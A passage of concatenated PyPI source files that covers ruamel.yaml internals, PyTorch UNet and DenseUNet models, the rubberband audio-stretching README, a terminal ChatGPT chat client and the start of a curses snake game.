class MyEmitter(ruamel.yaml.emitter.Emitter):
def __init__(self, *args, **kw):
assert args[0] is None
ruamel.yaml.emitter.Emitter.__init__(self, *args, **kw)
@property
def stream(self):
return ruamel.yaml.emitter.Emitter.stream.fget(self)
@stream.setter
def stream(self, val):
if val is None:
return ruamel.yaml.emitter.Emitter.stream.fset(self, None)
return ruamel.yaml.emitter.Emitter.stream.fset(
self, Rewriter(val, getattr(self.dumper, '_plug_in_' + typ))
)
def init_typ(self):
self.Reader = MyReader
self.Emitter = MyEmitter
self.Serializer = ruamel.yaml.serializer.Serializer # type: Any
self.Representer = ruamel.yaml.representer.RoundTripRepresenter # type: Any
self.Scanner = ruamel.yaml.scanner.RoundTripScanner # type: Any
self.Parser = ruamel.yaml.parser.RoundTripParser # type: Any
self.Composer = ruamel.yaml.composer.Composer # type: Any
self.Constructor = ruamel.yaml.constructor.RoundTripConstructor # type: Any
"""
class Sanitize:
def __init__(self):
self.accacc = None
self.accper = None
def __call__(self, s):
len = 1
for len in range(1, 10):
pat = '<' * len + '{'
if pat not in s:
self.accacc = pat
break
else:
raise NotImplementedError('could not find substitute pattern '+pat)
len = 1
for len in range(1, 10):
pat = '#' * len + '%'
if pat not in s:
self.accper = pat
break
else:
raise NotImplementedError('could not find substitute pattern '+pat)
return s.replace('{{', self.accacc).replace('{%', self.accper)
def revert(self, s):
return s.replace(self.accacc, '{{').replace(self.accper, '{%')
def update_one(file_name, out_file_name=None):
sanitize = Sanitize()
with open(file_name) as fp:
data = yaml.load(sanitize(fp.read()))
myArray = data['A']['B'][1]['myArray']
pos = myArray.index('val2')
myArray.insert(pos+1, 'val 3')
if out_file_name is None:
yaml.dump(data, sys.stdout, transform=sanitize.revert)
else:
with open(out_file_name, 'w') as fp:
yaml.dump(data, out, transform=sanitize.revert)
update_one('input.yaml')
""" | /ruamel.yaml.jinja2-0.2.7.tar.gz/ruamel.yaml.jinja2-0.2.7/__plug_in__.py | 0.704973 | 0.213234 | __plug_in__.py | pypi |
import sys
from ruamel.yaml.anchor import Anchor
from typing import Text, Any, Dict, List # NOQA
__all__ = ['ScalarFloat', 'ExponentialFloat', 'ExponentialCapsFloat']
class ScalarFloat(float):
def __new__(cls: Any, *args: Any, **kw: Any) -> Any:
width = kw.pop('width', None)
prec = kw.pop('prec', None)
m_sign = kw.pop('m_sign', None)
m_lead0 = kw.pop('m_lead0', 0)
exp = kw.pop('exp', None)
e_width = kw.pop('e_width', None)
e_sign = kw.pop('e_sign', None)
underscore = kw.pop('underscore', None)
anchor = kw.pop('anchor', None)
v = float.__new__(cls, *args, **kw)
v._width = width
v._prec = prec
v._m_sign = m_sign
v._m_lead0 = m_lead0
v._exp = exp
v._e_width = e_width
v._e_sign = e_sign
v._underscore = underscore
if anchor is not None:
v.yaml_set_anchor(anchor, always_dump=True)
return v
def __iadd__(self, a: Any) -> Any: # type: ignore
return float(self) + a
x = type(self)(self + a)
x._width = self._width
x._underscore = self._underscore[:] if self._underscore is not None else None # NOQA
return x
def __ifloordiv__(self, a: Any) -> Any: # type: ignore
return float(self) // a
x = type(self)(self // a)
x._width = self._width
x._underscore = self._underscore[:] if self._underscore is not None else None # NOQA
return x
def __imul__(self, a: Any) -> Any: # type: ignore
return float(self) * a
x = type(self)(self * a)
x._width = self._width
x._underscore = self._underscore[:] if self._underscore is not None else None # NOQA
x._prec = self._prec # check for others
return x
def __ipow__(self, a: Any) -> Any: # type: ignore
return float(self) ** a
x = type(self)(self ** a)
x._width = self._width
x._underscore = self._underscore[:] if self._underscore is not None else None # NOQA
return x
def __isub__(self, a: Any) -> Any: # type: ignore
return float(self) - a
x = type(self)(self - a)
x._width = self._width
x._underscore = self._underscore[:] if self._underscore is not None else None # NOQA
return x
@property
def anchor(self) -> Any:
if not hasattr(self, Anchor.attrib):
setattr(self, Anchor.attrib, Anchor())
return getattr(self, Anchor.attrib)
def yaml_anchor(self, any: bool = False) -> Any:
if not hasattr(self, Anchor.attrib):
return None
if any or self.anchor.always_dump:
return self.anchor
return None
def yaml_set_anchor(self, value: Any, always_dump: bool = False) -> None:
self.anchor.value = value
self.anchor.always_dump = always_dump
def dump(self, out: Any = sys.stdout) -> None:
out.write(
f'ScalarFloat({self}| w:{self._width}, p:{self._prec}, ' # type: ignore
f's:{self._m_sign}, lz:{self._m_lead0}, _:{self._underscore}|{self._exp}'
f', w:{self._e_width}, s:{self._e_sign})\n'
)
class ExponentialFloat(ScalarFloat):
def __new__(cls, value: Any, width: Any = None, underscore: Any = None) -> Any:
return ScalarFloat.__new__(cls, value, width=width, underscore=underscore)
class ExponentialCapsFloat(ScalarFloat):
def __new__(cls, value: Any, width: Any = None, underscore: Any = None) -> Any:
return ScalarFloat.__new__(cls, value, width=width, underscore=underscore) | /ruamel.yaml-0.17.32.tar.gz/ruamel.yaml-0.17.32/scalarfloat.py | 0.68595 | 0.160332 | scalarfloat.py | pypi |
from ruamel.yaml.anchor import Anchor
from typing import Text, Any, Dict, List # NOQA
from ruamel.yaml.compat import SupportsIndex
__all__ = [
'ScalarString',
'LiteralScalarString',
'FoldedScalarString',
'SingleQuotedScalarString',
'DoubleQuotedScalarString',
'PlainScalarString',
# PreservedScalarString is the old name, as it was the first to be preserved on rt,
# use LiteralScalarString instead
'PreservedScalarString',
]
class ScalarString(str):
__slots__ = Anchor.attrib
def __new__(cls, *args: Any, **kw: Any) -> Any:
anchor = kw.pop('anchor', None)
ret_val = str.__new__(cls, *args, **kw)
if anchor is not None:
ret_val.yaml_set_anchor(anchor, always_dump=True)
return ret_val
def replace(self, old: Any, new: Any, maxreplace: SupportsIndex = -1) -> Any:
return type(self)((str.replace(self, old, new, maxreplace)))
@property
def anchor(self) -> Any:
if not hasattr(self, Anchor.attrib):
setattr(self, Anchor.attrib, Anchor())
return getattr(self, Anchor.attrib)
def yaml_anchor(self, any: bool = False) -> Any:
if not hasattr(self, Anchor.attrib):
return None
if any or self.anchor.always_dump:
return self.anchor
return None
def yaml_set_anchor(self, value: Any, always_dump: bool = False) -> None:
self.anchor.value = value
self.anchor.always_dump = always_dump
class LiteralScalarString(ScalarString):
__slots__ = 'comment' # the comment after the | on the first line
style = '|'
def __new__(cls, value: Text, anchor: Any = None) -> Any:
return ScalarString.__new__(cls, value, anchor=anchor)
PreservedScalarString = LiteralScalarString
class FoldedScalarString(ScalarString):
__slots__ = ('fold_pos', 'comment') # the comment after the > on the first line
style = '>'
def __new__(cls, value: Text, anchor: Any = None) -> Any:
return ScalarString.__new__(cls, value, anchor=anchor)
class SingleQuotedScalarString(ScalarString):
__slots__ = ()
style = "'"
def __new__(cls, value: Text, anchor: Any = None) -> Any:
return ScalarString.__new__(cls, value, anchor=anchor)
class DoubleQuotedScalarString(ScalarString):
__slots__ = ()
style = '"'
def __new__(cls, value: Text, anchor: Any = None) -> Any:
return ScalarString.__new__(cls, value, anchor=anchor)
class PlainScalarString(ScalarString):
__slots__ = ()
style = ''
def __new__(cls, value: Text, anchor: Any = None) -> Any:
return ScalarString.__new__(cls, value, anchor=anchor)
def preserve_literal(s: Text) -> Text:
return LiteralScalarString(s.replace('\r\n', '\n').replace('\r', '\n'))
def walk_tree(base: Any, map: Any = None) -> None:
"""
the routine here walks over a simple yaml tree (recursing in
dict values and list items) and converts strings that
have multiple lines to literal scalars
You can also provide an explicit (ordered) mapping for multiple transforms
(first of which is executed):
map = ruamel.yaml.compat.ordereddict
map['\n'] = preserve_literal
map[':'] = SingleQuotedScalarString
walk_tree(data, map=map)
"""
from collections.abc import MutableMapping, MutableSequence
if map is None:
map = {'\n': preserve_literal}
if isinstance(base, MutableMapping):
for k in base:
v: Text = base[k]
if isinstance(v, str):
for ch in map:
if ch in v:
base[k] = map[ch](v)
break
else:
walk_tree(v, map=map)
elif isinstance(base, MutableSequence):
for idx, elem in enumerate(base):
if isinstance(elem, str):
for ch in map:
if ch in elem:
base[idx] = map[ch](elem)
break
else:
walk_tree(elem, map=map) | /ruamel.yaml-0.17.32.tar.gz/ruamel.yaml-0.17.32/scalarstring.py | 0.845305 | 0.218753 | scalarstring.py | pypi |
from ruamel.yaml.reader import Reader
from ruamel.yaml.scanner import Scanner, RoundTripScanner
from ruamel.yaml.parser import Parser, RoundTripParser
from ruamel.yaml.composer import Composer
from ruamel.yaml.constructor import (
BaseConstructor,
SafeConstructor,
Constructor,
RoundTripConstructor,
)
from ruamel.yaml.resolver import VersionedResolver
from typing import Any, Dict, List, Union, Optional # NOQA
from ruamel.yaml.compat import StreamTextType, VersionType # NOQA
__all__ = ['BaseLoader', 'SafeLoader', 'Loader', 'RoundTripLoader']
class BaseLoader(Reader, Scanner, Parser, Composer, BaseConstructor, VersionedResolver):
def __init__(
self,
stream: StreamTextType,
version: Optional[VersionType] = None,
preserve_quotes: Optional[bool] = None,
) -> None:
self.comment_handling = None
Reader.__init__(self, stream, loader=self)
Scanner.__init__(self, loader=self)
Parser.__init__(self, loader=self)
Composer.__init__(self, loader=self)
BaseConstructor.__init__(self, loader=self)
VersionedResolver.__init__(self, version, loader=self)
class SafeLoader(Reader, Scanner, Parser, Composer, SafeConstructor, VersionedResolver):
def __init__(
self,
stream: StreamTextType,
version: Optional[VersionType] = None,
preserve_quotes: Optional[bool] = None,
) -> None:
self.comment_handling = None
Reader.__init__(self, stream, loader=self)
Scanner.__init__(self, loader=self)
Parser.__init__(self, loader=self)
Composer.__init__(self, loader=self)
SafeConstructor.__init__(self, loader=self)
VersionedResolver.__init__(self, version, loader=self)
class Loader(Reader, Scanner, Parser, Composer, Constructor, VersionedResolver):
def __init__(
self,
stream: StreamTextType,
version: Optional[VersionType] = None,
preserve_quotes: Optional[bool] = None,
) -> None:
self.comment_handling = None
Reader.__init__(self, stream, loader=self)
Scanner.__init__(self, loader=self)
Parser.__init__(self, loader=self)
Composer.__init__(self, loader=self)
Constructor.__init__(self, loader=self)
VersionedResolver.__init__(self, version, loader=self)
class RoundTripLoader(
Reader,
RoundTripScanner,
RoundTripParser,
Composer,
RoundTripConstructor,
VersionedResolver,
):
def __init__(
self,
stream: StreamTextType,
version: Optional[VersionType] = None,
preserve_quotes: Optional[bool] = None,
) -> None:
# self.reader = Reader.__init__(self, stream)
self.comment_handling = None # issue 385
Reader.__init__(self, stream, loader=self)
RoundTripScanner.__init__(self, loader=self)
RoundTripParser.__init__(self, loader=self)
Composer.__init__(self, loader=self)
RoundTripConstructor.__init__(self, preserve_quotes=preserve_quotes, loader=self)
VersionedResolver.__init__(self, version, loader=self) | /ruamel.yaml-0.17.32.tar.gz/ruamel.yaml-0.17.32/loader.py | 0.839175 | 0.161783 | loader.py | pypi |
from typing import Any, Dict, Optional, List, Union, Optional, Iterator # NOQA
tag_attrib = '_yaml_tag'
class Tag:
"""store original tag information for roundtripping"""
attrib = tag_attrib
def __init__(self, handle: Any = None, suffix: Any = None, handles: Any = None) -> None:
self.handle = handle
self.suffix = suffix
self.handles = handles
self._transform_type: Optional[bool] = None
def __repr__(self) -> str:
return f'{self.__class__.__name__}({self.trval!r})'
def __str__(self) -> str:
return f'{self.trval}'
def __hash__(self) -> int:
try:
return self._hash_id # type: ignore
except AttributeError:
self._hash_id = res = hash((self.handle, self.suffix))
return res
def __eq__(self, other: Any) -> bool:
# other should not be a string, but the serializer sometimes provides these
if isinstance(other, str):
return self.trval == other
return bool(self.trval == other.trval)
def startswith(self, x: str) -> bool:
if self.trval is not None:
return self.trval.startswith(x)
return False
@property
def trval(self) -> Optional[str]:
try:
return self._trval
except AttributeError:
pass
if self.handle is None:
self._trval: Optional[str] = self.uri_decoded_suffix
return self._trval
assert self._transform_type is not None
if not self._transform_type:
# the non-round-trip case
self._trval = self.handles[self.handle] + self.uri_decoded_suffix
return self._trval
# round-trip case
if self.handle == '!!' and self.suffix in (
'null',
'bool',
'int',
'float',
'binary',
'timestamp',
'omap',
'pairs',
'set',
'str',
'seq',
'map',
):
self._trval = self.handles[self.handle] + self.uri_decoded_suffix
else:
# self._trval = self.handle + self.suffix
self._trval = self.handles[self.handle] + self.uri_decoded_suffix
return self._trval
value = trval
@property
def uri_decoded_suffix(self) -> Optional[str]:
try:
return self._uri_decoded_suffix
except AttributeError:
pass
if self.suffix is None:
self._uri_decoded_suffix: Optional[str] = None
return None
res = ''
# don't have to check for scanner errors here
idx = 0
while idx < len(self.suffix):
ch = self.suffix[idx]
idx += 1
if ch != '%':
res += ch
else:
res += chr(int(self.suffix[idx : idx + 2], 16))
idx += 2
self._uri_decoded_suffix = res
return res
def select_transform(self, val: bool) -> None:
"""
val: False -> non-round-trip
True -> round-trip
"""
assert self._transform_type is None
self._transform_type = val
def check_handle(self) -> bool:
if self.handle is None:
return False
return self.handle not in self.handles | /ruamel.yaml-0.17.32.tar.gz/ruamel.yaml-0.17.32/tag.py | 0.869438 | 0.250936 | tag.py | pypi |
import torch
import torch.nn as nn
import torch.nn.functional as F
class double_conv2d_bn(nn.Module):
def __init__(self,in_channels,out_channels,kernel_size=3,strides=1,padding='same'):
super(double_conv2d_bn,self).__init__()
self.conv1 = nn.Conv2d(in_channels,out_channels,
kernel_size=kernel_size,
stride = strides,padding=padding,bias=True)
self.conv2 = nn.Conv2d(out_channels,out_channels,
kernel_size = kernel_size,
stride = strides,padding=padding,bias=True)
self.bn1 = nn.BatchNorm2d(out_channels)
self.bn2 = nn.BatchNorm2d(out_channels)
def forward(self,x):
out = F.relu(self.bn1(self.conv1(x)))
out = F.relu(self.bn2(self.conv2(out)))
return out
class deconv2d_bn(nn.Module):
def __init__(self,in_channels,out_channels,kernel_size=2,strides=2):
super(deconv2d_bn,self).__init__()
self.conv1 = nn.ConvTranspose2d(in_channels,out_channels,
kernel_size = kernel_size,
stride = strides,bias=True)
self.bn1 = nn.BatchNorm2d(out_channels)
def forward(self,x):
out = F.relu(self.bn1(self.conv1(x)))
return out
class Unet(nn.Module):
'''
input_channels 图片的channel,模型最终输出的channel同input_channel
block 表示需要几次下采样/上采样
n 表示基础的filter数量,每次采样都是原来的2倍或者0.5倍
'''
def __init__(self,input_channels,blocks,n):
super(Unet,self).__init__()
self.input_channels = input_channels
self.blocks = blocks
self.n = n
self.sigmoid = nn.Sigmoid()
def forward(self,x):
skip_lst = []
# 下采样
for i in range(self.blocks):
if i == 0:
conv = double_conv2d_bn(self.input_channels,self.n)(x)
pool = F.max_pool2d(conv,2)
skip_lst.append(conv)
else:
conv = double_conv2d_bn(pow(2,i-1)*self.n,pow(2,i)*self.n)(pool)
pool = F.max_pool2d(conv,2)
skip_lst.append(conv)
# 中间层
conv = double_conv2d_bn(pow(2,self.blocks-1)*self.n,pow(2,self.blocks)*self.n)(pool)
# 上采样
# skip_lst = skip_lst.reverse()
items = list(range(self.blocks))
items.reverse()
for i in items:
convt = deconv2d_bn(pow(2,i+1)*self.n,pow(2,i)*self.n)(conv)
concat = torch.cat([convt,skip_lst[i]],dim=1)
conv = double_conv2d_bn(pow(2,i+1)*self.n,pow(2,i)*self.n)(concat)
outp = nn.Conv2d(self.n,self.input_channels,kernel_size=3,
stride=1,padding='same',bias=True)(conv)
outp = self.sigmoid(outp)
return outp | /ruanhantao-0.0.2.tar.gz/ruanhantao-0.0.2/src/UNet_pkg/UNet.py | 0.915554 | 0.411229 | UNet.py | pypi |
import torch
from torch.functional import block_diag
import torch.nn as nn
from torch.nn.modules import activation
from torch.nn.modules.dropout import Dropout
class Dense_layer(nn.Module):
'''
densenet中说 dense block中每层输出的feature map也就是growth rate
为了避免网络变得很宽,作者都是采用较小的k,比如32这样,作者的实验也表明小的k可以有更好的效果
这里的1*1卷积主要是为了让网络变窄,降低计算量。1*1卷积的channel是growth rate*4
'''
def __init__(self,input_channels,output_channels=32,p=0.2):
super(Dense_layer,self).__init__()
self.bn1 = nn.BatchNorm2d(input_channels)
self.conv1 = nn.Conv2d(input_channels,output_channels*4,kernel_size=1,padding='same')
self.bn2 = nn.BatchNorm2d(output_channels*4)
self.conv2 = nn.Conv2d(output_channels*4,output_channels,kernel_size=3,padding='same')
self.activation = nn.ReLU(inplace=True)
self.drop = nn.Dropout(p)
pass
def forward(self,x):
x = self.bn1(x)
x = self.conv1(x)
x = self.activation(x)
x = self.bn2(x)
x = self.conv2(x)
x = self.activation(x)
x = self.drop(x)
return x
class DenseBlock(nn.Module):
# 每一个DenseBlock由4个Dense_layer构成
def __init__(self,input_channels,output_channels):
super(DenseBlock,self).__init__()
self.dense_layer1 = Dense_layer(input_channels,output_channels)
self.dense_layer2 = Dense_layer(input_channels+output_channels,output_channels)
self.dense_layer3 = Dense_layer(input_channels+2*output_channels,output_channels)
self.dense_layer4 = Dense_layer(input_channels+3*output_channels,output_channels)
def forward(self,x):
x1 = self.dense_layer1(x)
x2 = self.dense_layer2(torch.cat([x,x1],dim=1))
x3 = self.dense_layer3(torch.cat([x,x1,x2],dim=1))
x4 = self.dense_layer4(torch.cat([x,x1,x2,x3],dim=1))
x5 = torch.cat([x,x1,x2,x3,x4],dim=1)
return x5
class Transition(nn.Module):
'''
transition layer有个参数reduction(范围是0到1),表示将这些输出缩小到原来的多少倍,默认是0.5,这样传给下一个Dense Block的时候channel数量就会减少一半
'''
def __init__(self,input_channels,reduction=0.5):
super(Transition,self).__init__()
self.bn = nn.BatchNorm2d(input_channels)
self.conv = nn.Conv2d(input_channels,int(input_channels*reduction),kernel_size=1,padding='same')
self.maxpool = nn.MaxPool2d(kernel_size=2,stride=2)
def forward(self,x):
x = self.bn(x)
x = self.conv(x)
x = self.maxpool(x)
return x
class DenseUNet(nn.Module):
def __init__(self,input_channels,blocks,growth_rate,reduction=0.5):
super(DenseUNet,self).__init__()
self.input_channels = input_channels
self.blocks = blocks
self.growth_rate = growth_rate
self.reduction = reduction
def forward(self,x):
lst = []
input_dim_lst = []
# 上采样
input_dim = self.input_channels
for i in range(self.blocks):
dense_out = DenseBlock(input_dim,self.growth_rate)(x) # input_channels -> input_channels + 4 * growth_rate
lst.append(dense_out)
input_dim = input_dim + 4*self.growth_rate
input_dim_lst.append(input_dim)
x = Transition(input_dim,self.reduction)(dense_out)
input_dim = int(input_dim * self.reduction)
# 中间层
# out = DenseBlock(input_dim,self.growth_rate)(x)
# 下采样
for i in range(self.blocks):
dense_out = DenseBlock(input_dim,self.growth_rate)(x)
up_out = nn.ConvTranspose2d(input_dim + 4 * self.growth_rate ,input_dim_lst[self.blocks-i-1],kernel_size = 2, stride = 2, bias=True)(dense_out)
x = torch.cat([up_out,lst[self.blocks-i-1]],dim=1)
input_dim = 2 * input_dim_lst[self.blocks-i-1]
# = nn.ConvTranspose2d(in_channels,out_channels,kernel_size = 2, stride = 2, bias=True)
out = DenseBlock(input_dim,self.growth_rate)(x)
out = DenseBlock(input_dim + 4*self.growth_rate ,self.growth_rate)(out)
out = nn.Conv2d( input_dim + 8 * self.growth_rate, self.input_channels, kernel_size=3, padding='same')(out)
out = nn.ReLU(inplace=True)(out)
return out
if __name__=='__main__':
model = DenseUNet(1,4,32)
x = torch.rand([2,1,512,512])
# print(x)
out = model(x)
print(out.shape) | /ruanhantao-0.0.2.tar.gz/ruanhantao-0.0.2/src/UNet_pkg/Dense_UNet.py | 0.884576 | 0.478407 | Dense_UNet.py | pypi |
README for rubberband Python3 Module
====================================
Introduction
------------
**rubberband** is a simple Python3 wrapper around the well-known librubberband_ sound stretching / pitch-shifting library. Unlike existing Python wrappers (e.g. pyrubberband_) this is a true native extension.
The initial release provides a single function that will stretch a mono audio stream by multiplying its duration by a provided factor. Future versions may include pitch shifting, and more complex processing based on data maps.
Installation
------------
The module is available only for MacOS and Linux. The code may compile on Windows, but it has not been tested. Dependencies are:
- Python 3 (preferably 3.6 or greater)
- librubberband_ (> 1.8)
- libsndfile_ (> 1.0)
Assuming these dependencies are met, then installation is simplicity itself::
pip3 install rubberband
The install script does check for the required libraries, and will complain vociferously if they cannot be located. Information on obtaining them is available from the links above.
API
---
Audio stream formatting
~~~~~~~~~~~~~~~~~~~~~~~
The module exposes a single function **rubberband.stretch** which applies the librubberband_ algorithm to a mono audio stream, encoded in one of the following formats, each of which has a corresponding constant, as set out in the third column:
.. table::
======= =========================== ================
Format Description Constant
======= =========================== ================
PCM_U8 unsigned 8-bit rubberband.uint8
PCM_S8 signed 8-bit rubberband.int8
PCM_16 signed 16-bit rubberband.int16
PCM_32 signed 32-bit rubberband.int32
FLOAT *normalised* 32-bit float rubberband.float32
======= =========================== ================
Note that floating point data is assumed to be normalised, so all samples lie in the range [-1,1).
Audio data can be passed to **rubberband.stretch** in any of three ways:
**Typed array**
A 1-dimensional NUMPY_ typed **array** object, whose **dtype** is one of ``numpy.uint8``,
``numpy.int8``, ``numpy.int16``, ``numpy.int32`` or ``numpy.float32``. The type of the audio
data is deduced from this, using the strangely convenient fact that if **T** is one of ``uint8``,
``int8``, ``int16``, ``int32``, ``float32`` then
.. code:: python
numpy.dtype(numpy.T).num == rubberband.T
**List**
A simple Python **list**, all of whose elements are of a type implicitly convertible to **float**.
In this case, the audio format cannot be deduced, so it must be specified using the *format* argument
to **rubberband.stretch** (see below).
**Raw bytestream**
A Python **bytes** object, whose content is the raw PCM byte stream (note: audio file metadata,
e.g. WAV file headers, must be stripped, so only PCM data remains). Again, in this case, the audio
format cannot be deduced, so it must be specified using the *format* argument
to **rubberband.stretch** (see below).
In all cases, the output from **rubberband.stretch** has the same PCM format, and is stored in the same
kind of object, as the input. So, for example, given a **bytes** object representing a **PCM_16**
audio channel, **rubberband.stretch** returns **bytes** object representing a **PCM_16**
stretched audio channel.
Method signature
~~~~~~~~~~~~~~~~
**rubberband.stretch** (*input*, *format* = **rubberband.float32**, *rate* = **48000** , *ratio* = **1** , *crispness* = **5** , *formants* = **False**, *precise* = **True** )
Arguments
*input*
The input is assumed to represent a single channel of PCM audio data, encoded with one
of the schemes listed above. It can be any of the types set out above.
*format*
The PCM format of the data, specified using one of the constants set out above. This
value is *ignored* if *input* is a NUMPY typed array, in which case the format is deduced
from its **dtype**.
*rate*
The frame rate of the input audio stream (so bit rate divided by sample size).
*ratio*
The ratio of output length to input length (in seconds / number of samples).
*crispness*
Integer 0 - 6, default 5: measure of performance - see the `rubberband-cli documentation`_
for more details.
*formants*
Boolean, default **False** : whether or not to preserve formants - see the
`rubberband-cli documentation`_ for more details.
*precise*
Boolean, default **True** : whether or not to use the precise stretching algorithm -
see the `rubberband-cli documentation`_ for more details.
Return value
An object containing the stretched audio data, represented using the same PCM encoding as the
*input*. Samples are normalised to lie in the expected range for the format.
Example
-------
.. code:: python
import rubberband
import soundfile
data,rate=soundfile.read('infile.wav',dtype='int16')
bitrate=rate*16
nFrames=len(data)
print(f'Raw input type is : {type(data)}')
oldDuration=nFrames/rate
newDuration=6
ratio=newDuration/oldDuration
out=rubberband.stretch(data,rate=rate,ratio=ratio,crispness=5,formants=False,precise=True)
soundfile.write('outfile.wav',out,rate,'PCM_16')
.. _librubberband: https://breakfastquay.com/rubberband/
.. _pyrubberband: https://pypi.org/project/pyrubberband/
.. _libsndfile: http://www.mega-nerd.com/libsndfile/
.. _`rubberband-cli documentation`: https://breakfastquay.com/rubberband/usage.txt
.. _NUMPY: https://numpy.org
| /rubberband-1.0.2.tar.gz/rubberband-1.0.2/README.rst | 0.882573 | 0.731838 | README.rst | pypi |
import re
import inquirer
import openai
import pyperclip
from halo import Halo
from rich.console import Console
from rich.syntax import Syntax
from rubberduck_chat.chat_gpt.session_store import *
from rubberduck_chat.utils import get_datetime
from dataclasses import dataclass
@dataclass
class GptChatSessionConfigs:
chat_gpt_model: str
max_messages_per_request: int
snippet_header_background_color: str
snippet_theme: str
class GptChatSession:
snippet_end_pattern = r'\s*```'
snippet_start_pattern = r'\s*```(\S+)?'
quote_pattern = re.compile(r'`([^`]*)`')
def __init__(self, session_id, configs: GptChatSessionConfigs, session_metadata: GptSessionMetadata,
system_message: GptSystemMessage,
turns: List[GptChatTurn]):
self.session_id: str = session_id
self.configs: GptChatSessionConfigs = configs
self.session_metadata: GptSessionMetadata = session_metadata
self.system_message: GptSystemMessage = system_message
self.turns: List[GptChatTurn] = turns
self.console: Console = Console()
self.snippets: List[str] = []
@classmethod
def create_new(cls, configs: GptChatSessionConfigs):
message = GptSystemMessage.from_system_message('You are a helpful assistant')
session_id = str(uuid4())
return cls(session_id, configs, GptSessionMetadata(session_id, int(time.time())), message, [])
@classmethod
def from_session_id(cls, session_id: str, configs: GptChatSessionConfigs):
lines: List[str] = fetch_session_data(session_id)
gpt_session_metadata: GptSessionMetadata = GptSessionMetadata.from_line(lines[0])
gpt_system_message: GptSystemMessage = GptSystemMessage.from_json_string(lines[1])
gpt_chat_turns: List[GptChatTurn] = []
turn_ids: set[str] = set()
for line in lines[-1:1:-1]:
turn = GptChatTurn.from_json_string(line)
if turn.id in turn_ids:
continue
turn_ids.add(turn.id)
gpt_chat_turns.append(turn)
gpt_chat_turns.reverse()
return cls(session_id, configs, gpt_session_metadata, gpt_system_message, gpt_chat_turns)
def print_current_session(self, print_time=False):
for turn in self.turns:
if print_time:
create_time = f'[{get_datetime(turn.created_time)}] '
else:
create_time = ''
print(f'>>>{create_time}{turn.user_prompt}')
assistant_response = turn.get_assistant_response()
if assistant_response:
self.print_assistant_response(assistant_response)
def process_prompt(self, prompt: str, configs: GptChatSessionConfigs):
current_turn = GptChatTurn.from_user_prompt(prompt)
self.store_chat_turn(current_turn)
self.turns.append(current_turn)
messages: List[dict] = [self.system_message.get_chat_gpt_request_message()]
for turn in self.turns[-(self.configs.max_messages_per_request + 1):]:
messages.append(turn.get_user_prompt_message())
assistant_response_message = turn.get_assistant_response_message()
if assistant_response_message:
messages.append(assistant_response_message)
response = None
error_message = None
with Halo(text='Fetching', spinner='dots'):
try:
response = openai.ChatCompletion.create(model=configs.chat_gpt_model, messages=messages)
except Exception as error:
error_message = str(error)
if error_message:
print(error_message)
return
if response:
current_turn.updated_response(response)
self.store_chat_turn(current_turn)
self.print_assistant_response(current_turn.get_assistant_response())
else:
print('No results found')
def print_assistant_response(self, message: str):
new_snippets: List[str] = []
message_parts = message.split('\n')
snippet = None
snippet_language = None
snippet_count = 0
for part in message_parts:
if re.search(self.snippet_end_pattern, part) and snippet is not None:
self.print_header(snippet_language, snippet_count)
self.print_code(snippet_language, snippet)
new_snippets.append(snippet)
snippet = None
snippet_language = None
elif re.search(self.snippet_start_pattern, part):
matches = re.findall(self.snippet_start_pattern, part)
if matches:
snippet_language = matches[0]
else:
snippet_language = None
snippet = ''
snippet_count += 1
elif snippet is not None:
snippet += part + '\n'
elif not part:
print()
else:
self.print_text(part)
if new_snippets:
self.snippets = new_snippets
print('')
def print_header(self, language: str, count: int):
copy_message = f'Enter "{count}" to copy snippet'
if language:
header = f' {language.upper()} | {copy_message}'
else:
header = f' {copy_message}'
syntax = Syntax(header, 'text', theme=self.configs.snippet_theme,
background_color=self.configs.snippet_header_background_color)
self.console.print(syntax, overflow='fold')
def print_code(self, language: str, code: str):
if not language:
language = 'text'
syntax = Syntax(code, language, theme=self.configs.snippet_theme)
self.console.print(syntax, overflow='fold')
def print_text(self, text: str):
highlighted_text = self.quote_pattern.sub(r'`\033[1m\1\033[0m`', text)
print(highlighted_text)
def has_snippet(self, snippet_index: int) -> bool:
return snippet_index <= len(self.snippets)
def copy_snippet(self, snippet_index: int):
if snippet_index <= len(self.snippets):
pyperclip.copy(self.snippets[snippet_index - 1])
print('Snippet copied to clipboard')
else:
print('No snippet to copy')
def store_chat_turn(self, gpt_chat_turn: GptChatTurn):
if self.turns:
store_chat_turn_to_file(self.session_id, gpt_chat_turn)
else:
store_metadata_to_file(self.session_id, self.session_metadata)
store_system_message_to_file(self.session_id, self.system_message)
store_chat_turn_to_file(self.session_id, gpt_chat_turn)
class GptChat:
def __init__(self, session: GptChatSession, configs: GptChatSessionConfigs):
self.session = session
self.configs = configs
def process_prompt(self, prompt: str):
self.session.process_prompt(prompt, self.configs)
def create_new_session(self):
self.session = GptChatSession.create_new(self.configs)
set_active_session_id(self.session.session_id)
print('Started new session')
def update_configs(self, configs: GptChatSessionConfigs):
self.configs = configs
self.session.configs = configs
def has_snippet(self, snippet_index: int) -> bool:
return self.session.has_snippet(snippet_index)
def copy_snippet(self, snippet_index: int):
self.session.copy_snippet(snippet_index)
def print_current_session(self):
self.session.print_current_session(print_time=True)
def change_session(self):
session_previews = get_all_session_previews()
if not session_previews:
print('No previous session found')
return
message = f'Select from {len(session_previews)} sessions'
previews = []
for session_preview in session_previews:
previews.append((session_preview.session_preview, session_preview))
options = [inquirer.List('option', message=message, choices=previews)]
answers = inquirer.prompt(options)
if answers:
preview: GptSessionPreview = answers['option']
self.session = GptChatSession.from_session_id(preview.session_id, self.configs)
self.session.print_current_session(print_time=True)
set_active_session_id(preview.session_id)
print(f'Loaded session: {preview.session_preview}') | /rubberduck-ai-0.6.0.tar.gz/rubberduck-ai-0.6.0/rubberduck_chat/chat_gpt/chat.py | 0.461259 | 0.261101 | chat.py | pypi |
import curses
import numpy as np
import game_utilities as gu
class Snake:
def __init__(self, game, initial_length):
self.cells = np.stack([
np.arange(initial_length) + (game.size[0] // 2),
np.zeros(initial_length, dtype="int64") + (game.size[1] // 2),
], axis=1)
self.direction = np.array([-1, 0])
@property
def length(self):
return self.cells.shape[0]
def intersected_itself(self):
return self.cells.shape[0] != np.unique(self.cells, axis=0).shape[0]
class Game:
_max_size = np.array([24, 80])
def __init__(self, stdscr):
self.stdscr = stdscr
@property
def size(self):
return np.amin(np.stack([
gu.window_size(self.stdscr) - [3, 2], # Subtracting rows/columns required by the score/hint text and borders
Game._max_size,
]), axis=0)
def show(self, settings):
snake = Snake(self, 1)
pellet = np.random.randint(self.size, size=2)
key = None
# getch return value of 27 corresponds to escape key - doesn't look like curses has a constant for this
